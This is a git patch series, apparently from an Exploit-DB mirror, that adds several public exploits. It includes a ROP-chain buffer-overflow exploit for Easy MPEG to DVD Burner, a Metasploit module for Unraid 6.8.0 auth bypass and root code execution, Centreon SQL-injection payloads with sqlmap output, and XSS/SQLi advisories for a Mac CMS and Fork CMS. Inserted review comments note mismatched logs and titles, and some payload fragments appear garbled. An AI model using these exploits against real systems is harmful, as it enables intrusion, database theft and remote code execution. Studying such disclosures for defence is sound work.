+
+1.3
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Mac Framework v1.1.4f Content Managament System.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The sql injection vulnerabilities are located in the `roleId` and
+`userId` of the `editRole` and `deletUser` module. The request method to
+inject or execute commands is GET and the attack vector is located on
+the application-side. Attackers with privileged accounts to edit are
+able to inject own sql queries via roleid and userid on deleteUser or
+editRole. Multiple unhandled and broken sql queries are visible as default
+debug to output for users as well.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a privileged web-application user account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] deleteUser
+[+] editRole
+
+Vulnerable Parameter(s):
+[+] userId
+[+] roleId
+
+
+Proof of Concept (PoC):
+=======================
+Google Dork(s): intitle, subtitle & co.
+Site Powered by Mac's PHP MVC Framework Framework of the future
+Design downloaded from Zeroweb.org: Free website templates, layouts, and
+tools.
+
+
+1.1
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without user account and with low user
+interaction.
+For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test" + + + +PoC: Payload +" + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: 
application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, +"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": 
+false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, +{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": 
+"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. 
+Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. 
+ + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. 
To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48339.py b/exploits/windows/local/48339.py new file mode 100755 index 000000000..355fbea67 --- /dev/null +++ b/exploits/windows/local/48339.py 
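Review bot: The second PoC session log under the 1.2 payload (the saveTest request to localhost:89/taoQtiTest with tao_* cookies and a QTI model body) is from a different application than the Macs Framework instance in the first log, so the advisory never actually demonstrates the forgotPasswordProcess/emailAddress finding it describes. The classification is also internally inconsistent: the header title says "Persistent Cross-Site Scripting" and the Security Risk section rates an "html inject" and a "persistent cross site scripting" issue, while Technical Details describes two non-persistent XSS issues (1.1, 1.2) and SQL injection (1.3), and section 1.3 says the request method is GET but then lists `Request Method(s): [+] POST`. I'd replace the second log with a capture from the Macs instance, align the Security Risk subsections with 1.1–1.3, and correct the 1.3 request method so readers can classify and write detections for the right endpoint and method.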
@@ -0,0 +1,150 @@ +# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) +# Date: 2020-04-15 +# Exploit Author: Bailey Belisario +# Tested On: Windows 7 Ultimate x64 +# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe +# Version: 1.7.11 +# Exploit Length: 1015 Bytes +# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode) + +# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow +# Exploit used with Python2.7 +#------------------------------------------------------------------------------------------------------------------------------------# +# Bad Characters: \x00\x0a\x0d # +# SEH Offset: 1012 # +# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe # +#------------------------------------------------------------------------------------------------------------------------------------# + +# Register setup for VirtualProtect() (Bypass DEP) : +#--------------------------------------------------- +# EAX = Points to PUSHAD at time VirtualProtect() is called +# ECX = lpflOldProtect (0x10047d30 as writable location) +# EDX = flNewProtect(0x40) +# EBX = dwSize (0x92) +# ESP = lpAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +import struct + +def create_rop_chain(): + + rop_gadgets = [ + + # Put 1 in EDX and decrement to 0 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x1003629a, # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN + 0x11111111, # Filler + + # Pop the pointer of VirtualProtect into EAX + 0x10037b12, # POP EAX # RETN + 0x1003b268, # ptr to &VirtualProtect() [IAT SkinMagic.dll] + + # Dereference Pointer into EDX then move back to EAX + 0x1001c011, # ADD EDX,DWORD PTR [EAX] # RETN 0x0C + 0x10031772, # MOV EAX,EDX # RETN + 
0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Push VP and pop into EBP + 0x1002e17b, # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C + 0x10037b12, # POP EAX # RETN + 0x11111111, # Filler + 0x11111111, # Filler + 0x11111111, # Filler + + # Use this to get to address needed to Pop VP into ESI + 0x1003619e, # POP EAX # POP ESI # RETN + + # Move VP to +12 on stack then push the POP POP RETN + 0x10032485, # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN + 0x11111111, # Filler popped + 0x11111111, # Filler popped + + # Set ESI to VP + 0x1002e1ce, # POP ESI # RETN [SkinMagic.dll] + 0x11111111, # Where VP is MOV into + + # Set EBP with POP EBP RETN + 0x1002894f, # POP EBP # RETN [SkinMagic.dll] + 0x1002894f, # skip 4 bytes [SkinMagic.dll] + + # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F) + # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40 + 0x10031752, # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN + 0x10037b12, # POP EAX # RETN + 0x1005a0a0, # Address of 3F + 0x10026173, # ADD EDX,DWORD PTR [EAX] # RETN + + # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers + # Note: This should be at least length of shellcode + 0x100362c6, # XOR EAX,EAX # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10033fb2, # ADD AL,0C9 # RETN + 0x10035c12, # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN + + # Set ECX to writable location + 0x1003603f, # POP ECX # RETN [SkinMagic.dll] + 0x10047d30, # &Writable location [SkinMagic.dll] + + # Set EDI to ROP NOP + 0x100395c2, # POP EDI # RETN [SkinMagic.dll] + 0x10032982, # RETN (ROP NOP) [SkinMagic.dll] + + # Do PUSHAD and be 1337 + 0x10037654, # POP EAX # RETN + 0xa140acd2, # CONSTANT + 0x100317c8, # ADD EAX,5EFFC883 # RETN + 0x1003248d, # PUSH EAX # RETN + + # Used to jump to ESP + 0x1001cc57, # ptr to 'push esp 
# ret ' [SkinMagic.dll] + ] + return ''.join(struct.pack(' Date: Tue, 21 Apr 2020 05:01:47 +0000 Subject: [PATCH 14/18] DB: 2020-04-21 7 changes to exploits/shellcodes Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH) Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite)) Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit) Centreon 19.10.5 - 'id' SQL Injection Fork CMS 5.8.0 - Persistent Cross-Site Scripting --- exploits/linux/remote/48353.rb | 101 +++++++ exploits/php/webapps/48345.txt | 69 +++++ exploits/php/webapps/48348.txt | 491 +++++++++++++++++++++++++++++++ exploits/windows/local/48346.py | 97 ++++++ exploits/windows/local/48350.py | 108 +++++++ exploits/windows/local/48351.py | 54 ++++ exploits/windows/local/48352.txt | 28 ++ files_exploits.csv | 7 + 8 files changed, 955 insertions(+) create mode 100755 exploits/linux/remote/48353.rb create mode 100644 exploits/php/webapps/48345.txt create mode 100644 exploits/php/webapps/48348.txt create mode 100755 exploits/windows/local/48346.py create mode 100755 exploits/windows/local/48350.py create mode 100755 exploits/windows/local/48351.py create mode 100644 exploits/windows/local/48352.txt diff --git a/exploits/linux/remote/48353.rb b/exploits/linux/remote/48353.rb new file mode 100755 index 000000000..55f048b35 --- /dev/null +++ b/exploits/linux/remote/48353.rb 
@@ -0,0 +1,101 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', + 'Description' => %q{ + This module exploits two vulnerabilities affecting Unraid 6.8.0. + An authentication bypass is used to gain access to the administrative + interface, and an insecure use of the extract PHP function can be abused + for arbitrary code execution as root. + }, + 'Author' => + [ + 'Nicolas CHATELAIN ' + ], + 'References' => + [ + [ 'CVE', '2020-5847' ], + [ 'CVE', '2020-5849' ], + [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], + [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['php'], + 'Privileged' => true, + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 10 2020' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) + ] + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET' + ) + + unless res + return CheckCode::Unknown('Connection failed') + end + + unless res.code == 200 + return CheckCode::Safe('Unexpected reply') + end + + /\sVersion:\s(?[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body + + if version && Gem::Version.new(version) == Gem::Version.new('6.8.0') + return CheckCode::Appears("Unraid version #{version} appears to be vulnerable") + end + + CheckCode::Safe + end + + def exploit + begin + vprint_status('Sending 
exploit code') + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => + { + 'path' => 'x', + 'site[x][text]' => Rex::Text.uri_encode("", 'hex-normal') + } + ) + + if res.nil? + print_good('Request timed out, OK if running a non-forking/blocking payload...') + elsif res.code == 302 + fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') + else + print_warning("Unexpected response code #{res.code}, please check your payload.") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt new file mode 100644 index 000000000..6a9c7ba07 --- /dev/null +++ b/exploits/php/webapps/48345.txt 
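Review bot: `check` returns `CheckCode::Safe` both when the status is not 200 and when the version banner does not match the regex, but an absent or unparsable banner means the version could not be determined, not that the host is patched; `CheckCode::Detected` for a reachable Unraid UI and `CheckCode::Unknown('Unexpected reply')` for the non-200 case would report that more accurately. In `exploit`, the `res.nil?` branch uses `print_good` for what may simply be a timeout or dropped connection, so a failed request is reported as success; `print_status('Request timed out, OK if running a non-forking/blocking payload...')` avoids the false positive. The description names two CVEs but the request built in `exploit` carries no comment saying which element exercises which; a short comment above the `vars_get` hash referencing CVE-2020-5847 and CVE-2020-5849 would make that mapping reviewable.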
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+ +[VULNERABLE VERSIONS] + + The following version of the Centreon Monitoring was affected by the + vulnerability; previous versions may be vulnerable as well: + - Centreon version 19.10.5 + + +[Proof of Concept] + + http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23 + + + [Payloads] + + Parameter: svc_id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: hid=15&svc_id=1 OR NOT 5782=5782 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy) + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL# +--- +[12:24:35] [INFO] testing MySQL +[12:24:35] [INFO] confirming MySQL +[12:24:35] [INFO] the back-end DBMS is MySQL +[12:24:35] [INFO] fetching banner +web server operating system: Linux Red Hat +web application technology: Apache 2.4.34, PHP 7.2.24 +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) +banner: '10.1.38-MariaDB' +[12:24:35] [INFO] fetching database names +[12:24:35] [INFO] starting 4 threads +[12:24:35] [INFO] resumed: 'centreon' +[12:24:35] [INFO] resumed: 'test' +[12:24:35] [INFO] resumed: 'centreon_storage' +[12:24:35] [INFO] resumed: 'information_schema' +available databases [4]: +[*] centreon +[*] centreon_storage +[*] information_schema +[*] test \ No newline at end of file diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt new file mode 100644 index 000000000..64d991ee6 --- /dev/null +++ b/exploits/php/webapps/48348.txt 
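Review bot: The executive summary describes a time-based blind SQL injection in a "tracker" / "project tracker service search functionality" whose exploitability depends on "project visibility", which does not match the PoC below it (the `svc_id` parameter of `makeXMLForAck.php` under the monitoring acknowledgement path); the summary reads as copied from a different advisory. The header title names the parameter as 'id' while every listed payload uses `svc_id`, and the text never states whether the endpoint requires an authenticated Centreon session. I'd rewrite the summary to describe the actual endpoint and parameter, retitle the entry to `Centreon 19.10.5 - 'svc_id' SQL Injection`, and state the authentication requirement so defenders can scope exposure and write detections against the right path and parameter.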
@@ -0,0 +1,491 @@ +# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.fork-cms.com/download +# Software Link: https://github.com/forkcms/forkcms/pull/3073 +# CVE: N/A + +Document Title: +=============== +Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2208 + +ID (3073): https://github.com/forkcms/forkcms/pull/3073 + + +Release Date: +============= +2020-04-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2208 + + +Common Vulnerability Scoring System: +==================================== +5.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Fork is an easy to use open source CMS using Symfony Components. Fork +CMS is dedicated to creating a user friendly environment +to build, monitor and +update your website. We take great pride in being the Content Management +System of choice for beginners and professionals. + +(Copy of the Homepage: https://www.fork-cms.com & +https://www.fork-cms.com/download ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the official Fork CMS v5.8.0. 
+ + +Affected Product(s): +==================== +ForkCMS +Product: Fork CMS v5.8.0 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been +discovered in the official Fork CMS v5.8.0 open-source web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the +`Displayname` input field when using the `Add`, `Edit` or `Register` +mechanism that forwards the information into the `var` parameter. Remote +attackers and privileged application user accounts are able to +inject own malicious persistent script code as the users displayname by +usage of the registration module (/profiles/register). Privileged +users with access to the profile or users module are able to exploit the +issue by a simple inject. The displayname then becomes visible in +the Admin - Profiles Index on Preview, Edit User/Profile, Delete User +Interaction and User Index in Listing modules. the var parameter +does not encode or parse the exisiting injected content and executes it. +The request method to inject is POST and the attack vector of the +vulnerability is located on the application-side of the content +management system. 
The injection point is located in the registration form +and the add/edit user function. The execution point of the issue occurs +in the preview profile, edit user, user index listing and delete +user message context. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Register +[+] Add User +[+] Edit User + +Vulnerable Input(s): +[+] Displayname + +Vulnerable Parameter(s): +[+] var + +Affected Module(s): +[+] Preview Profile +[+] Edit User +[+] User Index +[+] Delete User + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steüs below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the fork cms web-application newst version +2. Move via sitemap or by link to the registration page +(/modules/profiles/register) +3. Inject your script code payload html/js to the Displayname input field +4. Register the account by pushing submit +5. Activate the link in the account registration email +Note: Now simple wait until the administrator / privileged user visits +the panel to execute the code on interaction or preview only +6. Successful reproduce of the persistent script code injection +vulnerability! + + +PoC: Vulnerable Source (User Index in Listing - +https://fork-cms.localhost:8080/private/en/users/index) + +test3"> +>" + + + + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
